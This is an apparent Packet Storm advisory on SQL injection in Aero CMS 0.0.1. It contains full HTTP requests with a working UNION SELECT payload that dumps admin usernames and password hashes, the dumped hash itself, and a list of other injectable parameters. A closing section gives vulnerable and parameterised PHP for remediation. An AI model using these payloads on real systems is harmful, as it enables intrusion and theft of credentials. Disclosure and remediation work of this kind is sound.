Aero CMS 0.0.1 SQL Injection

Aero CMS version 0.0.1 suffers from multiple remote SQL injection vulnerabilities. Original discovery of this issue in this version is attributed to nu11secur1ty in August of 2022.

Packet Storm
# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: [email protected]
# Vendor Homepage: https://github.com/MegaTKC/AeroCMS
# Software Link: https://github.com/MegaTKC/AeroCMS
# Version: 0.0.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
#
# Example SQL Injection
-----------------------------------------------------------------------------------------------------------------------
Param: search
-----------------------------------------------------------------------------------------------------------------------
Req sql ini detect
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692'&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:06 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3466
Connection: close
Content-Type: text/html; charset=UTF-8

[...]
Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 21

search=245692''&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 03:07:10 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94216

[...]
-----------------------------------------------------------------------------------------------------------------------
Req exploiting sql ini get data admin
-----------------------------------------------------------------------------------------------------------------------
POST /AeroCMS-master/search.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
Origin: http://127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://127.0.0.1/AeroCMS-master/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 113

search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sat, 15 Oct 2022 05:40:05 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101144

[...]
<a href="#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
[...]
-----------------------------------------------------------------------------------------------------------------------
Other URL and params
-----------------------------------------------------------------------------------------------------------------------
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [filename]
/AeroCMS-master/admin/profile.php [filename]
/AeroCMS-master/author_posts.php [author]
/AeroCMS-master/category.php [category]
/AeroCMS-master/post.php [p_id]
/AeroCMS-master/search.php [search]
/AeroCMS-master/admin/categories.php [cat_title]
/AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
/AeroCMS-master/admin/posts.php [post_content]
/AeroCMS-master/admin/posts.php [p_id]
/AeroCMS-master/admin/posts.php [post_category_id]
/AeroCMS-master/admin/posts.php [post_title]
/AeroCMS-master/admin/posts.php [reset]
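The MariaDB error in the first response (syntax error near '%'') shows the search term being interpolated into a LIKE '%...%' pattern, which is why a lone quote breaks the query and a doubled quote does not. The snippet below is an added, illustrative reconstruction of that pattern next to its hardened form; it is not AeroCMS's own code, and the table and column names (posts, post_title) are assumptions.

```php
<?php
// Added illustration, not code from AeroCMS. Table/column names are assumed.

// VULNERABLE pattern: the raw POST value is concatenated into the SQL text, so a
// single quote in "search" closes the string literal and whatever follows is parsed
// as SQL. This is the shape implied by the "near '%''" error in the advisory.
function search_posts_vulnerable(mysqli $db, string $search): array
{
    $sql = "SELECT * FROM posts WHERE post_title LIKE '%$search%'";
    $result = $db->query($sql);
    if ($result === false) {
        // Returning $db->error to the client, as the advisory's response does,
        // hands a probe a confirmation oracle; log it server-side instead.
        error_log('search query failed: ' . $db->error);
        throw new RuntimeException('search failed');
    }
    return $result->fetch_all(MYSQLI_ASSOC);
}

// HARDENED form: the term travels as a bound parameter, so quotes, UNION, and '#'
// are plain characters to the server. LIKE wildcards are escaped and the %...%
// wrapping happens in PHP, keeping the SQL text constant.
function search_posts_safe(mysqli $db, string $search): array
{
    $term = '%' . addcslashes($search, '%_\\') . '%';
    $stmt = $db->prepare('SELECT * FROM posts WHERE post_title LIKE ?');
    $stmt->bind_param('s', $term);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Assumed usage from search.php; the input still comes straight from the POST body.
$db = new mysqli('127.0.0.1', 'aerocms', 'password-placeholder', 'aerocms');
$db->set_charset('utf8mb4');
$rows = search_posts_safe($db, $_POST['search'] ?? '');
```

The same substitution of a bound parameter for string concatenation applies to every injection point listed under "Other URL and params", including the p_id and post_category_id integers and the phpwcmsBELang cookie.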
